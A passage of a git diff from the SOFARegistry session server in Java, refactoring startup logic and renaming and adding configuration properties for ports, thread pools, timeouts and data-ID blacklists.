fetchStopPushSwitch(); + + fetchBlackList(); + metaStart.set(true); + + LOGGER.info( + "MetaServer connected meta server! Port:{}", sessionServerConfig.getMetaServerPort()); + } catch (Exception e) { + metaStart.set(false); + LOGGER.error( + "MetaServer connected server error! Port:{}", sessionServerConfig.getMetaServerPort(), e); + throw new RuntimeException("MetaServer connected server error!", e); } - - private void stopHttpServer() { - if (httpServer != null && httpServer.isOpen()) { - httpServer.close(); - } + } + + private void fetchStopPushSwitch() { + ProvideData data = metaNodeService.fetchData(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); + if (data != null && data.getProvideData() != null) { + provideDataProcessorManager.fetchDataProcess(data); + } else { + LOGGER.info("Fetch session stop push switch data null,config not change!"); } - - /** - * Getter method for property metaStart. - * - * @return property value of metaStart - */ - public AtomicBoolean getMetaStart() { - return metaStart; + // start fetch change data after got the switch + sessionRegistry.fetchChangDataProcess(); + } + + private void fetchBlackList() { + blacklistManager.load(); + } + + private void openHttpServer() { + try { + if (httpStart.compareAndSet(false, true)) { + bindResourceConfig(); + httpServer = + jerseyExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + sessionServerConfig.getHttpServerPort()), + new ResourceConfig[] {jerseyResourceConfig}); + LOGGER.info("Open http server port {} success!", sessionServerConfig.getHttpServerPort()); + } + } catch (Exception e) { + LOGGER.error("Open http server port {} error!", sessionServerConfig.getHttpServerPort(), e); + httpStart.set(false); + throw new RuntimeException("Open http server error!", e); } - - /** - * Getter method for property schedulerStart. - * - * @return property value of schedulerStart - */ - public AtomicBoolean getSchedulerStart() { - return schedulerStart; + } + + private void bindResourceConfig() { + registerInstances(Path.class); + registerInstances(Provider.class); + } + + private void registerInstances(Class annotationType) { + Map beans = applicationContext.getBeansWithAnnotation(annotationType); + if (beans != null && !beans.isEmpty()) { + beans.forEach( + (beanName, bean) -> { + jerseyResourceConfig.registerInstances(bean); + jerseyResourceConfig.register(bean.getClass()); + }); } - - /** - * Getter method for property httpStart. - * - * @return property value of httpStart - */ - public AtomicBoolean getHttpStart() { - return httpStart; + } + + private void registerSerializer() { + ProtobufCustomSerializer serializer = new ProtobufCustomSerializer(); + CustomSerializerManager.registerCustomSerializer( + PublisherRegisterPb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer( + SubscriberRegisterPb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer( + SyncConfigRequestPb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer( + SyncConfigResponsePb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer( + RegisterResponsePb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer(ResultPb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer(ReceivedDataPb.class.getName(), serializer); + CustomSerializerManager.registerCustomSerializer( + ReceivedConfigDataPb.class.getName(), serializer); + + SerializerManager.addSerializer( + ProtobufSerializer.PROTOCOL_PROTOBUF, ProtobufSerializer.getInstance()); + } + + private void stopServer() { + if (server != null && server.isOpen()) { + server.close(); } + } - /** - * Getter method for property serverStart. - * - * @return property value of serverStart - */ - public AtomicBoolean getServerStart() { - return serverStart; + private void stopDataSyncServer() { + if (dataSyncServer != null && dataSyncServer.isOpen()) { + dataSyncServer.close(); } + } - /** - * Getter method for property dataStart. - * - * @return property value of dataStart - */ - public AtomicBoolean getDataStart() { - return dataStart; + private void stopHttpServer() { + if (httpServer != null && httpServer.isOpen()) { + httpServer.close(); } -} \ No newline at end of file + } + + /** + * Getter method for property metaStart. + * + * @return property value of metaStart + */ + public boolean getMetaStart() { + return metaStart.get(); + } + + /** + * Getter method for property schedulerStart. + * + * @return property value of schedulerStart + */ + public boolean getSchedulerStart() { + return schedulerStart.get(); + } + + /** + * Getter method for property httpStart. + * + * @return property value of httpStart + */ + public boolean getHttpStart() { + return httpStart.get(); + } + + /** + * Getter method for property serverStart. + * + * @return property value of serverStart + */ + public boolean getServerStart() { + return serverStart.get(); + } + + /** + * Getter method for property dataStart. + * + * @return property value of dataStart + */ + public boolean getDataStart() { + return dataStart.get(); + } + + public boolean getServerForSessionSyncStart() { + return serverForSessionSyncStart.get(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfig.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfig.java index 98668f574..c1b19e5c7 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfig.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfig.java @@ -16,128 +16,155 @@ */ package com.alipay.sofa.registry.server.session.bootstrap; +import java.util.Collection; + /** * SessionServerConfig Interface + * * @author shangyu.wh * @version $Id: SessionServerConfig.java, v 0.1 2017-11-14 11:47 synex Exp $ */ public interface SessionServerConfig { - int getServerPort(); + int getServerPort(); + + int getSyncSessionPort(); + + int getSyncSessionIOLowWaterMark(); + + int getSyncSessionIOHighWaterMark(); + + int getMetaServerPort(); + + int getDataServerPort(); + + int getDataServerNotifyPort(); + + int getHttpServerPort(); + + int getSchedulerHeartbeatIntervalSecs(); + + int getSchedulerScanVersionIntervalMillis(); + + int getClientNodeExchangeTimeoutMillis(); + + int getDataNodeExchangeTimeoutMillis(); + + int getDataNodeExchangeForFetchDatumTimeoutMillis(); - int getMetaServerPort(); + int getMetaNodeExchangeTimeoutMillis(); - int getDataServerPort(); + String getSessionServerRegion(); - int getHttpServerPort(); + String getClientCell(String clientCell); - int getSchedulerHeartbeatTimeout(); + String getSessionServerDataCenter(); - int getSchedulerHeartbeatFirstDelay(); + int getSubscriberRegisterFetchRetryTimes(); - int getSchedulerHeartbeatExpBackOffBound(); + int getAccessDataExecutorMinPoolSize(); - int getSchedulerGetSessionNodeTimeout(); + int getAccessDataExecutorMaxPoolSize(); - int getSchedulerGetSessionNodeFirstDelay(); + int getAccessDataExecutorQueueSize(); - int getSchedulerGetSessionNodeExpBackOffBound(); + long getAccessDataExecutorKeepAliveTime(); - int getSchedulerFetchDataTimeout(); + int getDataChangeExecutorMinPoolSize(); - int getSchedulerFetchDataFirstDelay(); + int getDataChangeExecutorMaxPoolSize(); - int getSchedulerFetchDataExpBackOffBound(); + int getDataChangeExecutorQueueSize(); - int getClientNodeExchangeTimeOut(); + long getDataChangeExecutorKeepAliveTime(); - int getDataNodeExchangeTimeOut(); + int getDataChangeDebouncingMillis(); - int getMetaNodeExchangeTimeOut(); + int getDataChangeMaxDebouncingMillis(); - String getSessionServerRegion(); + int getPushTaskExecutorPoolSize(); - String getSessionServerDataCenter(); + int getPushTaskExecutorQueueSize(); - int getReceivedDataMultiPushTaskRetryTimes(); + int getPushTaskRetryTimes(); - int getCancelDataTaskRetryTimes(); + int getPushDataTaskRetryFirstDelayMillis(); - int getCancelDataTaskRetryFirstDelay(); + int getPushDataTaskRetryIncrementDelayMillis(); - long getCancelDataTaskRetryIncrementDelay(); + int getPushDataTaskDebouncingMillis(); - int getDataChangeFetchTaskRetryTimes(); + int getConnectClientExecutorMinPoolSize(); - int getSubscriberRegisterFetchRetryTimes(); + int getConnectClientExecutorMaxPoolSize(); - int getSessionRegisterDataServerTaskRetryTimes(); + int getConnectClientExecutorQueueSize(); - int getSchedulerConnectMetaTimeout(); + int getDataChangeFetchTaskMaxBufferSize(); - int getSchedulerConnectMetaFirstDelay(); + int getDataChangeFetchTaskWorkerSize(); - int getSchedulerConnectMetaExpBackOffBound(); + String getBlacklistPubDataIdRegex(); - int getSchedulerConnectDataTimeout(); + String getBlacklistSubDataIdRegex(); - int getSchedulerConnectDataFirstDelay(); + boolean isStopPushSwitch(); - int getSchedulerConnectDataExpBackOffBound(); + void setStopPushSwitch(boolean stopPushSwitch); - int getAccessDataExecutorMinPoolSize(); + boolean isInvalidForeverZone(String zoneId); - int getAccessDataExecutorMaxPoolSize(); + boolean isInvalidIgnored(String dataId); - int getAccessDataExecutorQueueSize(); + int getDataNodeRetryQueueSize(); - long getAccessDataExecutorKeepAliveTime(); + int getDataNodeRetryTimes(); - int getDataChangeExecutorMinPoolSize(); + int getDataNodeRetryBackoffMillis(); - int getDataChangeExecutorMaxPoolSize(); + int getDataNodeExecutorWorkerSize(); - int getDataChangeExecutorQueueSize(); + int getDataNodeExecutorQueueSize(); - long getDataChangeExecutorKeepAliveTime(); + int getDataNodeMaxBatchSize(); - int getPushTaskExecutorMinPoolSize(); + double getAccessLimitRate(); - int getPushTaskExecutorMaxPoolSize(); + int getDataClientConnNum(); - int getPushTaskExecutorQueueSize(); + int getDataNotifyClientConnNum(); - long getPushTaskExecutorKeepAliveTime(); + int getSessionSchedulerPoolSize(); - int getDisconnectClientExecutorMinPoolSize(); + int getSlotSyncPublisherMaxNum(); - int getDisconnectClientExecutorMaxPoolSize(); + Collection getMetaServerAddresses(); - int getDisconnectClientExecutorQueueSize(); + int getSlotSyncMaxBufferSize(); - int getDataChangeFetchTaskMaxBufferSize(); + int getSlotSyncWorkerSize(); - int getDataChangeFetchTaskWorkerSize(); + int getMetaNodeBufferSize(); - int getUserDataPushRetryWheelTicksSize(); + int getMetaNodeWorkerSize(); - int getUserDataPushRetryWheelTicksDuration(); + int getAccessMetadataMaxBufferSize(); - int getPushDataTaskRetryFirstDelay(); + int getAccessMetadataWorkerSize(); - long getPushDataTaskRetryIncrementDelay(); + int getCacheDigestIntervalMinutes(); - int getNumberOfReplicas(); + int getCacheCountIntervalSecs(); - boolean isStopPushSwitch(); + int getCacheDatumMaxNums(); - void setStopPushSwitch(boolean stopPushSwitch); + int getCacheDatumExpireSecs(); - boolean isBeginDataFetchTask(); + int getHeartbeatCacheCheckerInitialDelaySecs(); - void setBeginDataFetchTask(boolean beginDataFetchTask); + int getHeartbeatCacheCheckerSecs(); - boolean isInvalidForeverZone(String zoneId); + int getRevisionHeartbeatInitialDelayMinutes(); - boolean isInvalidIgnored(String dataId); -} \ No newline at end of file + int getRevisionHeartbeatMinutes(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfigBean.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfigBean.java index 916c5d641..12e00876f 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfigBean.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfigBean.java @@ -16,1336 +16,1257 @@ */ package com.alipay.sofa.registry.server.session.bootstrap; -import org.springframework.boot.context.properties.ConfigurationProperties; - -import java.util.Collections; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.OsUtils; +import java.util.Collection; import java.util.HashSet; import java.util.Set; import java.util.regex.Pattern; +import org.apache.commons.lang.builder.ToStringBuilder; +import org.apache.commons.lang.builder.ToStringStyle; +import org.springframework.boot.context.properties.ConfigurationProperties; /** * The type Session server config bean. + * * @author shangyu.wh * @version $Id : SessionServerConfigBean.java, v 0.1 2017-11-14 11:49 synex Exp $ */ @ConfigurationProperties(prefix = SessionServerConfigBean.PREFIX) public class SessionServerConfigBean implements SessionServerConfig { - /** - * The constant PREFIX. - */ - public static final String PREFIX = "session.server"; - - private int serverPort = 9600; - - private int metaServerPort = 9610; - - private int dataServerPort = 9620; - - private int httpServerPort; - - private int schedulerHeartbeatTimeout = 3; - - private int schedulerHeartbeatFirstDelay = 3; - - private int schedulerHeartbeatExpBackOffBound = 10; - - private int schedulerGetSessionNodeTimeout = 3; - - private int schedulerGetSessionNodeFirstDelay = 5; - - private int schedulerGetSessionNodeExpBackOffBound = 10; - - private int schedulerFetchDataTimeout = 1; //MINUTES - - private int schedulerFetchDataFirstDelay = 30; - - private int schedulerFetchDataExpBackOffBound = 10; + /** The constant PREFIX. */ + public static final String PREFIX = "session.server"; - private int schedulerConnectMetaTimeout = 5; + private int serverPort = 9600; - private int schedulerConnectMetaFirstDelay = 5; + private int syncSessionPort = 9602; - private int schedulerConnectMetaExpBackOffBound = 10; + private int syncSessionIOLowWaterMark = 1024 * 128; - private int schedulerConnectDataTimeout = 3; + private int syncSessionIOHighWaterMark = 1024 * 256; - private int schedulerConnectDataFirstDelay = 3; + private int metaServerPort = 9610; - private int schedulerConnectDataExpBackOffBound = 10; + private int dataServerPort = 9620; - private int cancelDataTaskRetryTimes = 5; + private int dataServerNotifyPort = 9623; - private int cancelDataTaskRetryFirstDelay = 100; + private int httpServerPort = 9603; - private long cancelDataTaskRetryIncrementDelay = 200; + private int schedulerHeartbeatIntervalSecs = 1; - private int dataChangeFetchTaskRetryTimes = 3; + private int subscriberRegisterFetchRetryTimes = 3; - private int subscriberRegisterFetchRetryTimes = 3; + private int accessDataExecutorMinPoolSize = OsUtils.getCpuCount() * 10; - private int receivedDataMultiPushTaskRetryTimes = 3; + private int accessDataExecutorMaxPoolSize = OsUtils.getCpuCount() * 20; - private int sessionRegisterDataServerTaskRetryTimes = 5; + private int accessDataExecutorQueueSize = 10000; - private int defaultSessionExecutorMinPoolSize = cpus(); + private long accessDataExecutorKeepAliveTime = 60; - private int defaultSessionExecutorMaxPoolSize = cpus() * 5; //5*CPUs by default + private int dataChangeExecutorMinPoolSize = OsUtils.getCpuCount() * 2; - private long defaultSessionExecutorKeepAliveTime = 60; + private int dataChangeExecutorMaxPoolSize = OsUtils.getCpuCount() * 3; - private int accessDataExecutorMinPoolSize = 100; + private int dataChangeExecutorQueueSize = 20000; - private int accessDataExecutorMaxPoolSize = 400; + private long dataChangeExecutorKeepAliveTime = 60; - private int accessDataExecutorQueueSize = 10000; + private int connectClientExecutorMinPoolSize = OsUtils.getCpuCount(); - private long accessDataExecutorKeepAliveTime = 60; + private int connectClientExecutorMaxPoolSize = OsUtils.getCpuCount(); - private int pushTaskExecutorMinPoolSize = 40; + private int connectClientExecutorQueueSize = 2000; - private int pushTaskExecutorMaxPoolSize = 400; + private int dataChangeFetchTaskMaxBufferSize = 30000; - private int pushTaskExecutorQueueSize = 100000; + private int dataChangeFetchTaskWorkerSize = OsUtils.getCpuCount() * 5; - private long pushTaskExecutorKeepAliveTime = 60; + private int dataChangeDebouncingMillis = 1000; + private int dataChangeMaxDebouncingMillis = 3000; - private int dataChangeExecutorMinPoolSize = 40; + private int slotSyncMaxBufferSize = 5000; - private int dataChangeExecutorMaxPoolSize = 400; + private int slotSyncWorkerSize = OsUtils.getCpuCount() * 4; - private int dataChangeExecutorQueueSize = 100000; + private int metaNodeBufferSize = 2000; - private long dataChangeExecutorKeepAliveTime = 60; + private int metaNodeWorkerSize = OsUtils.getCpuCount() * 4; - private int disconnectClientExecutorMinPoolSize = 40; + private int accessMetadataMaxBufferSize = 10000; - private int disconnectClientExecutorMaxPoolSize = 200; + private int accessMetadataWorkerSize = OsUtils.getCpuCount() * 4; - private int disconnectClientExecutorQueueSize = 10000; + private int clientNodeExchangeTimeoutMillis = 1000; - private int dataChangeFetchTaskMaxBufferSize = 1000000; + private int dataNodeExchangeTimeoutMillis = 3000; - private int dataChangeFetchTaskWorkerSize = 100; + private int dataNodeExchangeForFetchDatumTimeoutMillis = 5000; - private int clientNodeExchangeTimeOut = 1000; //time out cause netty HashedWheelTimer occupy a lot of mem + private int metaNodeExchangeTimeoutMillis = 3000; - private int dataNodeExchangeTimeOut = 3000; + private int pushTaskExecutorPoolSize = OsUtils.getCpuCount() * 3; - private int metaNodeExchangeTimeOut = 3000; + private int pushTaskExecutorQueueSize = pushTaskExecutorPoolSize * 3000; - private int numberOfReplicas = 1000; + private int pushDataTaskRetryFirstDelayMillis = 500; - private int userDataPushRetryWheelTicksSize = 5120; + private int pushDataTaskRetryIncrementDelayMillis = 500; - private int userDataPushRetryWheelTicksDuration = 100; + private int pushDataTaskDebouncingMillis = 500; - private int pushDataTaskRetryFirstDelay = 500; + private int pushTaskRetryTimes = 3; - private long pushDataTaskRetryIncrementDelay = 500; + private int dataNodeExecutorWorkerSize = OsUtils.getCpuCount() * 8; - private String sessionServerRegion; + private int dataNodeExecutorQueueSize = 20000; - private String sessionServerDataCenter; - - private boolean stopPushSwitch = false; - - private boolean beginDataFetchTask = false; - - //begin config for enterprise version - - /** forever close push zone,such as:RZBETA */ - private String invalidForeverZones = ""; - /** config regex,exception to the rule of forever close push zone*/ - private String invalidIgnoreDataidRegex = ""; - - private Set invalidForeverZonesSet; - - private Pattern invalidIgnoreDataIdPattern = null; - - private String pushEmptyDataDataIdPrefixes = ""; - - private Set pushEmptyDataDataIdPrefixesSet; - - //end config for enterprise version - - private CommonConfig commonConfig; - - /** - * constructor - * @param commonConfig - */ - public SessionServerConfigBean(CommonConfig commonConfig) { - this.commonConfig = commonConfig; - } - - /** - * Getter method for property serverPort. - * - * @return property value of serverPort - */ - @Override - public int getServerPort() { - return serverPort; - } - - /** - * Setter method for property serverPort. - * - * @param serverPort value to be assigned to property serverPort - */ - public void setServerPort(int serverPort) { - this.serverPort = serverPort; - } + private int dataNodeRetryBackoffMillis = 1000; - /** - * Getter method for property schedulerHeartbeatTimeout. - * - * @return property value of schedulerHeartbeatTimeout - */ - @Override - public int getSchedulerHeartbeatTimeout() { - return schedulerHeartbeatTimeout; - } + private int dataNodeRetryTimes = 5; - /** - * Setter method for property schedulerHeartbeatTimeout. - * - * @param schedulerHeartbeatTimeout value to be assigned to property schedulerHeartbeatTimeout - */ - public void setSchedulerHeartbeatTimeout(int schedulerHeartbeatTimeout) { - this.schedulerHeartbeatTimeout = schedulerHeartbeatTimeout; - } + private int dataNodeRetryQueueSize = 1000; - /** - * Getter method for property schedulerHeartbeatFirstDelay. - * - * @return property value of schedulerHeartbeatFirstDelay - */ - @Override - public int getSchedulerHeartbeatFirstDelay() { - return schedulerHeartbeatFirstDelay; - } + private int dataNodeMaxBatchSize = 100; - /** - * Setter method for property schedulerHeartbeatFirstDelay. - * - * @param schedulerHeartbeatFirstDelay value to be assigned to property schedulerHeartbeatFirstDelay - */ - public void setSchedulerHeartbeatFirstDelay(int schedulerHeartbeatFirstDelay) { - this.schedulerHeartbeatFirstDelay = schedulerHeartbeatFirstDelay; - } + private int schedulerScanVersionIntervalMillis = 1000 * 5; - /** - * Getter method for property schedulerHeartbeatExpBackOffBound. - * - * @return property value of schedulerHeartbeatExpBackOffBound - */ - @Override - public int getSchedulerHeartbeatExpBackOffBound() { - return schedulerHeartbeatExpBackOffBound; - } + private double accessLimitRate = 100000.0; - /** - * Setter method for property schedulerHeartbeatExpBackOffBound. - * - * @param schedulerHeartbeatExpBackOffBound value to be assigned to property schedulerHeartbeatExpBackOffBound - */ - public void setSchedulerHeartbeatExpBackOffBound(int schedulerHeartbeatExpBackOffBound) { - this.schedulerHeartbeatExpBackOffBound = schedulerHeartbeatExpBackOffBound; - } + private String sessionServerRegion; - /** - * Getter method for property schedulerFetchDataTimeout. - * - * @return property value of schedulerFetchDataTimeout - */ - @Override - public int getSchedulerFetchDataTimeout() { - return schedulerFetchDataTimeout; - } + private String sessionServerDataCenter; - /** - * Setter method for property schedulerFetchDataTimeout. - * - * @param schedulerFetchDataTimeout value to be assigned to property schedulerFetchDataTimeout - */ - public void setSchedulerFetchDataTimeout(int schedulerFetchDataTimeout) { - this.schedulerFetchDataTimeout = schedulerFetchDataTimeout; - } + private volatile boolean stopPushSwitch = false; - /** - * Getter method for property schedulerFetchDataFirstDelay. - * - * @return property value of schedulerFetchDataFirstDelay - */ - @Override - public int getSchedulerFetchDataFirstDelay() { - return schedulerFetchDataFirstDelay; - } + // begin config for enterprise version - /** - * Setter method for property schedulerFetchDataFirstDelay. - * - * @param schedulerFetchDataFirstDelay value to be assigned to property schedulerFetchDataFirstDelay - */ - public void setSchedulerFetchDataFirstDelay(int schedulerFetchDataFirstDelay) { - this.schedulerFetchDataFirstDelay = schedulerFetchDataFirstDelay; - } + /** forever close push zone,such as:RZBETA */ + private String invalidForeverZones = ""; + /** config regex,exception to the rule of forever close push zone */ + private String invalidIgnoreDataidRegex = ""; - /** - * Getter method for property schedulerFetchDataExpBackOffBound. - * - * @return property value of schedulerFetchDataExpBackOffBound - */ - @Override - public int getSchedulerFetchDataExpBackOffBound() { - return schedulerFetchDataExpBackOffBound; - } + private volatile Set invalidForeverZonesSet; - /** - * Setter method for property schedulerFetchDataExpBackOffBound. - * - * @param schedulerFetchDataExpBackOffBound value to be assigned to property schedulerFetchDataExpBackOffBound - */ - public void setSchedulerFetchDataExpBackOffBound(int schedulerFetchDataExpBackOffBound) { - this.schedulerFetchDataExpBackOffBound = schedulerFetchDataExpBackOffBound; - } + private volatile Pattern invalidIgnoreDataIdPattern = null; - /** - * Getter method for property cancelDataTaskRetryTimes. - * - * @return property value of cancelDataTaskRetryTimes - */ - @Override - public int getCancelDataTaskRetryTimes() { - return cancelDataTaskRetryTimes; - } + private String blacklistPubDataIdRegex = ""; - /** - * Setter method for property cancelDataTaskRetryTimes. - * - * @param cancelDataTaskRetryTimes value to be assigned to property cancelDataTaskRetryTimes - */ - public void setCancelDataTaskRetryTimes(int cancelDataTaskRetryTimes) { - this.cancelDataTaskRetryTimes = cancelDataTaskRetryTimes; - } + private String blacklistSubDataIdRegex = ""; - /** - * Getter method for property cancelDataTaskRetryFirstDelay. - * - * @return property value of cancelDataTaskRetryFirstDelay - */ - @Override - public int getCancelDataTaskRetryFirstDelay() { - return cancelDataTaskRetryFirstDelay; - } + private int dataClientConnNum = 10; + private int dataNotifyClientConnNum = 2; + private int sessionSchedulerPoolSize = OsUtils.getCpuCount(); - /** - * Setter method for property cancelDataTaskRetryFirstDelay. - * - * @param cancelDataTaskRetryFirstDelay value to be assigned to property cancelDataTaskRetryFirstDelay - */ - public void setCancelDataTaskRetryFirstDelay(int cancelDataTaskRetryFirstDelay) { - this.cancelDataTaskRetryFirstDelay = cancelDataTaskRetryFirstDelay; - } + private int slotSyncPublisherMaxNum = 512; - /** - * Getter method for property cancelDataTaskRetryIncrementDelay. - * - * @return property value of cancelDataTaskRetryIncrementDelay - */ - @Override - public long getCancelDataTaskRetryIncrementDelay() { - return cancelDataTaskRetryIncrementDelay; - } + private int cacheDigestIntervalMinutes = 15; - /** - * Setter method for property cancelDataTaskRetryIncrementDelay. - * - * @param cancelDataTaskRetryIncrementDelay value to be assigned to property cancelDataTaskRetryIncrementDelay - */ - public void setCancelDataTaskRetryIncrementDelay(long cancelDataTaskRetryIncrementDelay) { - this.cancelDataTaskRetryIncrementDelay = cancelDataTaskRetryIncrementDelay; - } + private int cacheCountIntervalSecs = 30; - /** - * Getter method for property receivedDataMultiPushTaskRetryTimes. - * - * @return property value of receivedDataMultiPushTaskRetryTimes - */ - @Override - public int getReceivedDataMultiPushTaskRetryTimes() { - return receivedDataMultiPushTaskRetryTimes; - } + private int cacheDatumMaxNums = 2000; - /** - * Setter method for property receivedDataMultiPushTaskRetryTimes. - * - * @param receivedDataMultiPushTaskRetryTimes value to be assigned to property receivedDataMultiPushTaskRetryTimes - */ - public void setReceivedDataMultiPushTaskRetryTimes(int receivedDataMultiPushTaskRetryTimes) { - this.receivedDataMultiPushTaskRetryTimes = receivedDataMultiPushTaskRetryTimes; - } + private int cacheDatumExpireSecs = 60 * 3; - /** - * Getter method for property dataChangeFetchTaskRetryTimes. - * - * @return property value of dataChangeFetchTaskRetryTimes - */ - @Override - public int getDataChangeFetchTaskRetryTimes() { - return dataChangeFetchTaskRetryTimes; - } + // metadata config start - /** - * Setter method for property dataChangeFetchTaskRetryTimes. - * - * @param dataChangeFetchTaskRetryTimes value to be assigned to property dataChangeFetchTaskRetryTimes - */ - public void setDataChangeFetchTaskRetryTimes(int dataChangeFetchTaskRetryTimes) { - this.dataChangeFetchTaskRetryTimes = dataChangeFetchTaskRetryTimes; - } + private int heartbeatCacheCheckerInitialDelaySecs = 60; - /** - * Getter method for property subscriberRegisterFetchRetryTimes. - * - * @return property value of subscriberRegisterFetchRetryTimes - */ - @Override - public int getSubscriberRegisterFetchRetryTimes() { - return subscriberRegisterFetchRetryTimes; - } + private int heartbeatCacheCheckerSecs = 60; - /** - * Setter method for property subscriberRegisterFetchRetryTimes. - * - * @param subscriberRegisterFetchRetryTimes value to be assigned to property subscriberRegisterFetchRetryTimes - */ - public void setSubscriberRegisterFetchRetryTimes(int subscriberRegisterFetchRetryTimes) { - this.subscriberRegisterFetchRetryTimes = subscriberRegisterFetchRetryTimes; - } + private int revisionHeartbeatInitialDelayMinutes = 10; - /** - * Getter method for property sessionRegisterDataServerTaskRetryTimes. - * - * @return property value of sessionRegisterDataServerTaskRetryTimes - */ - @Override - public int getSessionRegisterDataServerTaskRetryTimes() { - return sessionRegisterDataServerTaskRetryTimes; - } + private int revisionHeartbeatMinutes = 10; - /** - * Setter method for property sessionRegisterDataServerTaskRetryTimes. - * - * @param sessionRegisterDataServerTaskRetryTimes value to be assigned to property sessionRegisterDataServerTaskRetryTimes - */ - public void setSessionRegisterDataServerTaskRetryTimes(int sessionRegisterDataServerTaskRetryTimes) { - this.sessionRegisterDataServerTaskRetryTimes = sessionRegisterDataServerTaskRetryTimes; - } + // metadata config end - /** - * Getter method for property clientNodeExchangeTimeOut. - * - * @return property value of clientNodeExchangeTimeOut - */ - @Override - public int getClientNodeExchangeTimeOut() { - return clientNodeExchangeTimeOut; - } + // end config for enterprise version - /** - * Setter method for property clientNodeExchangeTimeOut. - * - * @param clientNodeExchangeTimeOut value to be assigned to property clientNodeExchangeTimeOut - */ - public void setClientNodeExchangeTimeOut(int clientNodeExchangeTimeOut) { - this.clientNodeExchangeTimeOut = clientNodeExchangeTimeOut; - } + private CommonConfig commonConfig; - /** - * Getter method for property dataNodeExchangeTimeOut. - * - * @return property value of dataNodeExchangeTimeOut - */ - @Override - public int getDataNodeExchangeTimeOut() { - return dataNodeExchangeTimeOut; - } + private volatile Collection metaAddresses; - /** - * Setter method for property dataNodeExchangeTimeOut. - * - * @param dataNodeExchangeTimeOut value to be assigned to property dataNodeExchangeTimeOut - */ - public void setDataNodeExchangeTimeOut(int dataNodeExchangeTimeOut) { - this.dataNodeExchangeTimeOut = dataNodeExchangeTimeOut; - } + /** + * constructor + * + * @param commonConfig + */ + public SessionServerConfigBean(CommonConfig commonConfig) { + this.commonConfig = commonConfig; + } - /** - * Getter method for property metaServerPort. - * - * @return property value of metaServerPort - */ - @Override - public int getMetaServerPort() { - return metaServerPort; - } + /** + * Getter method for property serverPort. + * + * @return property value of serverPort + */ + @Override + public int getServerPort() { + return serverPort; + } - /** - * Setter method for property metaServerPort. - * - * @param metaServerPort value to be assigned to property metaServerPort - */ - public void setMetaServerPort(int metaServerPort) { - this.metaServerPort = metaServerPort; - } + @Override + public int getSyncSessionPort() { + return syncSessionPort; + } - @Override - public String getSessionServerRegion() { - if (commonConfig != null) { - String region = commonConfig.getLocalRegion(); - if (region != null && !region.isEmpty()) { - return commonConfig.getLocalRegion().toUpperCase(); - } + /** + * Setter method for property serverPort. + * + * @param serverPort value to be assigned to property serverPort + */ + public void setServerPort(int serverPort) { + this.serverPort = serverPort; + } + + /** + * Getter method for property schedulerHeartbeatIntervalSec. + * + * @return property value of schedulerHeartbeatIntervalSec + */ + @Override + public int getSchedulerHeartbeatIntervalSecs() { + return schedulerHeartbeatIntervalSecs; + } + + /** + * Setter method for property schedulerHeartbeatIntervalSec. + * + * @param schedulerHeartbeatIntervalSec value to be assigned to property + * schedulerHeartbeatIntervalSec + */ + public void setSchedulerHeartbeatTimeout(int schedulerHeartbeatIntervalSec) { + this.schedulerHeartbeatIntervalSecs = schedulerHeartbeatIntervalSec; + } + + @Override + public int getPushTaskRetryTimes() { + return pushTaskRetryTimes; + } + + public void setPushTaskRetryTimes(int pushTaskRetryTimes) { + this.pushTaskRetryTimes = pushTaskRetryTimes; + } + + /** + * Getter method for property subscriberRegisterFetchRetryTimes. + * + * @return property value of subscriberRegisterFetchRetryTimes + */ + @Override + public int getSubscriberRegisterFetchRetryTimes() { + return subscriberRegisterFetchRetryTimes; + } + + /** + * Setter method for property subscriberRegisterFetchRetryTimes. + * + * @param subscriberRegisterFetchRetryTimes value to be assigned to property + * subscriberRegisterFetchRetryTimes + */ + public void setSubscriberRegisterFetchRetryTimes(int subscriberRegisterFetchRetryTimes) { + this.subscriberRegisterFetchRetryTimes = subscriberRegisterFetchRetryTimes; + } + + /** + * Getter method for property clientNodeExchangeTimeOut. + * + * @return property value of clientNodeExchangeTimeOut + */ + @Override + public int getClientNodeExchangeTimeoutMillis() { + return clientNodeExchangeTimeoutMillis; + } + + /** + * Setter method for property clientNodeExchangeTimeOut. + * + * @param clientNodeExchangeTimeoutMillis value to be assigned to property + * clientNodeExchangeTimeOut + */ + public void setClientNodeExchangeTimeoutMillis(int clientNodeExchangeTimeoutMillis) { + this.clientNodeExchangeTimeoutMillis = clientNodeExchangeTimeoutMillis; + } + + /** + * Getter method for property dataNodeExchangeTimeOut. + * + * @return property value of dataNodeExchangeTimeOut + */ + @Override + public int getDataNodeExchangeTimeoutMillis() { + return dataNodeExchangeTimeoutMillis; + } + + /** + * Setter method for property dataNodeExchangeTimeOut. + * + * @param dataNodeExchangeTimeoutMillis value to be assigned to property dataNodeExchangeTimeOut + */ + public void setDataNodeExchangeTimeoutMillis(int dataNodeExchangeTimeoutMillis) { + this.dataNodeExchangeTimeoutMillis = dataNodeExchangeTimeoutMillis; + } + + /** + * Getter method for property metaServerPort. + * + * @return property value of metaServerPort + */ + @Override + public int getMetaServerPort() { + return metaServerPort; + } + + /** + * Setter method for property metaServerPort. + * + * @param metaServerPort value to be assigned to property metaServerPort + */ + public void setMetaServerPort(int metaServerPort) { + this.metaServerPort = metaServerPort; + } + + @Override + public String getSessionServerRegion() { + if (commonConfig != null) { + String region = commonConfig.getLocalRegion(); + if (region != null && !region.isEmpty()) { + return 